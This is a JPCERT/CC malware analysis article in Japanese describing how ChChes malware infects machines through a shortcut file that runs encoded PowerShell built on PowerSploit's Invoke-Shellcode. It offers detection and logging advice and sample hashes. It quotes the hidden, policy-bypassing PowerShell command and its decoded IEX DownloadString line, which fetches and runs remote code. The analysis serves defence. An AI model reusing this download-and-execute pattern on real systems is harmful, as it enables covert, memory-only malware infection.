PowerSploitを悪用して感染するマルウエア(2017-02-10) - JPCERT/CC Eyes By 朝長 秀誠 (Shusei Tomonaga) Published: 2017-02-09 · Archived: 2026-04-05 17:33:08 UTC ChChes PowerSploitを悪用して感染するマルウエア 今回は、前号の分析センターだより「Cookieヘッダーを用いてC&Cサーバとやりとりするマルウエア ChChes」で紹介したChChesが、PowerSploit[1]というオープンソースのツールを悪用して感染する事例 を確認しましたので、その詳細について解説します。 ChChesが感染するまでの流れ 今回確認した検体は、ショートカットファイルを悪用してマルウエアの感染を行います。ショートカ ットファイルが開かれてから、ChChesに感染するまでの流れは、図1のようになります。 図 1:ショートカットファイルを開いてからChChes感染までの流れ ショートカットファイルが開かれると、PowerShellスクリプトを含むファイルが外部からダウンロード され、実行されます。次に、PowerShellスクリプト内に含まれるChChesのコード(バージョン1.6.4) が、powershell.exeにインジェクションされ、実行されます。この過程の各段階における詳細な挙動を 次に解説します。 ショートカットファイルが開かれた時の挙動 ショートカットファイルを開くと内部に含まれている次のPowerShellスクリプトが実行されます。 powershell.exe -nop -w hidden -exec bypass -enc JAAyAD0AJwAtAG4Abw~省略~ 「-enc」以降のPowerShellスクリプトはエンコードされており、以下がデコードしたものです。 $2='-nop -w hidden -exec bypass -c "IEX (New-Object System.Net.Webclient).DownloadString(''https://go https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html Page 1 of 6 上記PowerShellスクリプトによって、指定されているURLからPowerShellスクリプトを含むファイルが ダウンロードされます。ダウンロードされたスクリプトは32bitのpowershell.exe (syswow64\WindowsPowerShell\v1.0\powershell)に読み込まれて実行されます。32bitで実行する理由 は、PowerShellスクリプト内に含まれるChChesのコードが64bit環境に対応していないためと考えられま す。 ダウンロードされるPowerShellスクリプトの詳細 ダウンロードされるPowerShellスクリプトはPowerSploitの一部(Invoke-Shellcode.ps1)を流用して作成 されています。PowerSploitは、リモートのコンピュータ上でファイルやコマンドを実行するためのツ ールで、ペネトレーションテストなどに利用されます。 ダウンロードされたPowerShellスクリプトは実行されると、内部に含まれるドキュメントファイル を%TEMP%フォルダに作成し、表示します。表示するドキュメントファイルはExcel文書やWord文書な ど複数のパターンが存在することを確認しています。 さらにPowerShellスクリプトは、内部に含まれるChChesのコードをpowershell.exeにインジェクションし ます。インジェクションされたChChesは前号の分析センターだよりで紹介した通り、C2サーバから命 令とモジュールを受信します。なお、このPowerShellスクリプトやインジェクションされるChChesは、 感染端末上でファイルとして保存されないため、ChChes自身はメモリ上にのみ存在することになりま す。 図2はPowerShellスクリプトの一部です。 図 2:ダウンロードされるPowerShellスクリプト イベントログで攻撃の痕跡を確認 Windows 10などPowerShell v5.0がインストールされた環境では、リモートからダウンロードされて実行 されたPowerShellスクリプトがデフォルトでイベントログに記録されるようになっており、図3のよう に記録されます。調査を行う際は、このようなイベントログがないかご確認ください。 https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html Page 2 of 6 図 3:イベントログに記録される内容 このようなログは、PowerShell v4.0(Windows 8.1のデフォルトバージョン)でも以下のグループポリシ ーを有効にすることで取得することが可能です。 コンピュータの構成 -> 管理用テンプレート -> Windows PowerShell -> PowerShellスクリプト ブロ ックのログ記録を有効にする (Turn on PowerShell Script Block Logging) おわりに PowerShellスクリプトが攻撃に利用されることは一般的になってきました。PowerShell実行時のイベン トログを取得する設定になっていない場合は、今後このような攻撃の被害にあうことを想定して、設 定を見直すことを推奨します。また、PowerShellを使用していない場合は、AppLockerなどを使用して 実行を制限することをご検討下さい。 分析センター 朝長 秀誠 参考情報 [1] PowerSploit   https://github.com/PowerShellMafia/PowerSploit Appendix A 検体のSHA-256ハッシュ値 PowerShell 4ff6a97d06e2e843755be8697f3324be36e1ebeb280bb45724962ce4b6710297 75ef6ea0265d2629c920a6a1c0d1dd91d3c0eda86445c7d67ebb9b30e35a2a9f ae0dd5df608f581bbc075a88c48eedeb7ac566ff750e0a1baa7718379941db86 646f837a9a5efbbdde474411bb48977bff37abfefaa4d04f9fb2a05a23c6d543 3d5e3648653d74e2274bb531d1724a03c2c9941fdf14b8881143f0e34fe50f03 9fbd69da93fbe0e8f57df3161db0b932d01b6593da86222fabef2be31899156d 723983883fc336cb575875e4e3ff0f19bcf05a2250a44fb7c2395e564ad35d48 f45b183ef9404166173185b75f2f49f26b2e44b8b81c7caf6b1fc430f373b50b 471b7edbd3b344d3e9f18fe61535de6077ea9fd8aa694221529a2ff86b06e856 aef976b95a8d0f0fdcfe1db73d5e0ace2c748627c1da645be711d15797c5df38 https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html Page 3 of 6 dbefa21d3391683d7cc29487e9cd065be188da228180ab501c34f0e3ec2d7dfc 朝長 秀誠 (Shusei Tomonaga) 外資系ITベンダーでのセキュリティ監視・分析業務を経て、2012年12月から現職。現在は、マルウェ ア分析・フォレンジック調査に従事。主に、標的型攻撃に関するインシデント分析を行っている。 CODE BLUE、BsidesLV、BlackHat USA Arsenal、Botconf、PacSec、FIRSTなどで講演。JSACオーガナ イザー。 関連記事 JSAC2026 開催レポート~DAY 2~ 攻撃グループAPT-C-60による攻撃のアップデート https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html Page 4 of 6 Cobalt Strike Beaconの機能をクロスプラットフォームへと拡張するツール「CrossC2」を使った攻 撃 Ivanti Connect Secureの脆弱性を起点とした侵害で確認されたマルウェア Ivanti Connect Secureに設置されたマルウェアDslogdRAT https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html Page 5 of 6 Source: https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html Page 6 of 6